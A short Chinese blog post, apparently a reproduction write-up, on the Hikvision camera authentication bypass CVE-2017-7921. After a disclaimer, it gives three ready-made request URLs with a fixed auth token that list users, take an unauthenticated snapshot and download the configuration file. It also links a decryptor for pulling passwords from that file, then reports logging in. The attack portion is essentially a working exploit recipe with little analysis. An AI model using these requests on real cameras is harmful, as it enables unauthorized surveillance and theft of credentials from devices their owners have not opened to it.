海康威视未授权访问漏洞 (CVE-2017-7921)复现研究

前言:本文内容仅供学习参考及处置建议,文章内容不涉及任何以破坏为目的的犯罪行为,敏感信息已经过脱敏处理,请勿将本文内容用于违法犯罪活动!

一、发现摄像头

(略)

二、构造payload测试

以下是可能存在漏洞的登录页面样式,经供参考。

复制代码
1.http://[摄像头IP]/Security/users?auth=YWRtaW46MTEK 获取用户 
2.http://[摄像头IP]/onvif-http/snapshot?auth=YWRtaW46MTEK 拍摄快照而不进行身份验证 
3.http://[摄像头IP]/System/configurationFile?auth=YWRtaW46MTEK 下载配置文件(该文件包含用户名密码等关键信息)

构造第一条语句,看到用户admin:

构造第二条语句,拍摄快照:

构造第三条语句,下载配置文件;

三、解密配置文件获取用户名密码

拿到用户名密码,登录成功。

解密脚本地址:

https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

声明:本文档仅供安全研究与学习交流使用,切勿用于非法渗透测试或未授权攻击。

相关推荐
KKKlucifer11 小时前
数据安全管控产品选型排名与深度解析
网络·安全
其实防守也摸鱼13 小时前
软件安全与漏洞--软件安全编码与防御技术理论题库
开发语言·网络·安全·网络安全·软件安全·软件安全与漏洞
极创信息13 小时前
Linux挖矿病毒深度清理实战教程,从进程隐藏、Rootkit驻留到彻底根除
java·大数据·linux·运维·安全·tomcat·健康医疗
数据知道13 小时前
指纹浏览器本地存储“孤岛化”:IndexedDB、LocalStorage、SessionStorage 的安全隔离
爬虫·安全·数据采集·指纹浏览器
xhtdj14 小时前
智源大会圆桌大模型没有终局具身智能可能是中国的 AlphaGo 时刻
人工智能·clickhouse·安全·动态规划
HavenlonLabs14 小时前
区块链解决信任分布,AI 需要解决能力控制
人工智能·安全·区块链
MartinYeung514 小时前
[论文学习]大型语言模型(LLM)安全与隐私-基于善、恶、丑的深度分析
学习·安全·语言模型
独泪了无痕14 小时前
Vue3中防御XSS攻击的“特效药”-DOMPurify
前端·vue.js·安全
ylscode15 小时前
GreatXML BitLocker绕过漏洞深度解析:Windows Defender离线扫描如何被改造成本地提权后门
windows·安全
站斧小威15 小时前
跨境新店养号阶段环境精细化设置技巧
安全